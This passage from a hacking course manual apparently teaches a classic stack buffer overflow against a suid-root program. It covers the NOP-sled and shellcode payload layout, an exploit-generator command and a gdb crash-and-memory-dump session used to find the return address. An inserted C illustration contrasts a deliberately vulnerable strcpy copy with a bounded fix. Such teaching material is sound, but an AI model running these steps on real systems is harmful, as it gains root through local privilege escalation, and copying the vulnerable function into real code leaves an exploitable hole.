All we have to do now is inject a string containing the shellcode to execute and overwrite EIP with the address found previously:
[NOP]...[NOP][SHELLCODE][0xbffffb10]
We are going to see how to exploit the vuln1.c program, on which the suid root bit has been set:
$chown root.root vuln1
$chmod 4755 vuln1
Let us use xploit.c to generate the string (intended to exploit the program) into an environment variable, which you will pass as an argument to the vulnerable suid root binary. We will use it twice in a row: first to inject the string containing the shellcode in order to determine the buffer address with gdb, then to inject the same string while overwriting EIP with the address found.
First, we overwrite EIP with a default address.
$./xploit -b 600 -E RET
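As an added illustration (not code from the Hackademy manual; vuln1.c itself is not reproduced on this page), here is the bug class assumed for vuln1.c, an unbounded copy of argument or environment data into a fixed-size stack buffer, next to the bounded copy that closes it. BUF_SIZE and all function names are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 512   /* assumed size of the stack buffer in vuln1.c */

/* Deliberately vulnerable (the pattern assumed for vuln1.c): strcpy() stops only
 * at the NUL, so input longer than BUF_SIZE runs past the buffer into the saved
 * EBP and return address. Kept for comparison only; nothing below calls it. */
void vulnerable_copy(const char *src)
{
    char buf[BUF_SIZE];
    strcpy(buf, src);          /* no length check at all */
    printf("copied %zu bytes\n", strlen(buf));
}

/* Hardened replacement: measure first, reject what does not fit with its NUL,
 * copy exactly that many bytes. Returns 0 on success, -1 if rejected. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (dst_size == 0 || len >= dst_size)
        return -1;             /* would overflow: refuse, do not truncate silently */
    memcpy(dst, src, len + 1); /* len + 1 copies the terminator too */
    return 0;
}

/* Same shape as vulnerable_copy(), built on bounded_copy(). */
int safe_copy(const char *src)
{
    char buf[BUF_SIZE];
    if (bounded_copy(buf, sizeof buf, src) != 0) {
        fprintf(stderr, "rejected %zu-byte input (limit %d)\n", strlen(src), BUF_SIZE - 1);
        return -1;
    }
    printf("copied %zu bytes\n", strlen(buf));
    return 0;
}

/* Boundary check helper: feeds a constructed run of n 'A' bytes (the page
 * builds a 600-byte one) through safe_copy() and returns its result. */
int check_input_length(size_t n)
{
    static char input[1024];
    if (n >= sizeof input) return -1;
    memset(input, 'A', n);
    input[n] = '\0';
    return safe_copy(input);
}
```

With the bounded version, a 600-byte argument is refused outright instead of spilling over the saved return address, so the gdb crash shown below never happens.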
We are going to look for an address pointing into the NOPs preceding the shellcode with the help of gdb.
xdream@Laptop:/tmp$ gdb vuln1
(gdb) r $RET
Starting program: /tmp/vuln1 $RET
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0xbffffade in ?? ()
We have redirected the program's execution to the default address, which does not contain the shellcode.
Let us dump memory from the address pointed to by ESP (the top of the stack) while looking for the injected string:
(gdb) x/500x $esp
0xbffff6c3: 0xfaafb8bf 0xf6cdbfff 0xcff8bfff 0x00004014
0xbffff6d3: 0xfffab800 0xfffab8bf 0xfffab8bf 0xfffab8bf
...
0xbffff843: 0x00000000 0x36383669 0x6d742f00 0x75762f70
0xbffff853: 0x00316e6c 0x90909090 0x90909090 0x90909090
0xbffff863: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff873: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff883: 0x90909090 0x90909090 0x90909090 0x90909090
The Hackademy DMP -146/209- SYSDREAM